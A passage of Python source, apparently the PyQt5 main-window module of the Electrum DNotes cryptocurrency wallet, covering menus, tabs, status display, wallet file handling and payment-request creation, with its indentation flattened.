# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum_dnotes import keystore, simple_config
from electrum_dnotes.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_dnotes import constants
from electrum_dnotes.plugins import run_hook
from electrum_dnotes.i18n import _
from electrum_dnotes.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword)
from electrum_dnotes import Transaction
from electrum_dnotes import util, bitcoin, commands, coinchooser
from electrum_dnotes import paymentrequest
from electrum_dnotes.wallet import Multisig_Wallet, AddTransactionException
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_dnotes.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), tab.tab_name == 'addresses'):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-dnotes.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum DNotes Testnet" if constants.net.TESTNET else "Electrum DNotes"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend DNotess with it."),
_("Make sure you own the seed phrase or the private keys, before you request DNotess to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum DNotes was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
#history_menu.addAction(_("&Summary"), self.history_list.show_summary)
#history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum DNotes preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
#tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
#raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://github.com/DNotesCoin/electrum-dnotes"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("https://github.com/DNotesCoin/electrum-dnotes")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
#help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('dnotes:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum DNotes",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum DNotes's focus is speed, with low resource usage and simplifying DNotes. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the DNotes system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/DNotesCoin/electrum-dnotes/issues\">https://github.com/DNotesCoin/electrum-dnotes/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum DNotes (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum DNotes - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum DNotes", message, QIcon(":icons/electrum-dnotes_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum DNotes", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mNOTE'
if self.decimal_point == 8:
return 'NOTE'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('DNotes address where the payment should be received. Note that each payment request uses a different DNotes address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding DNotes addresses.'),
_('The DNotes address never expires and will always be part of this electrum-dnotes wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
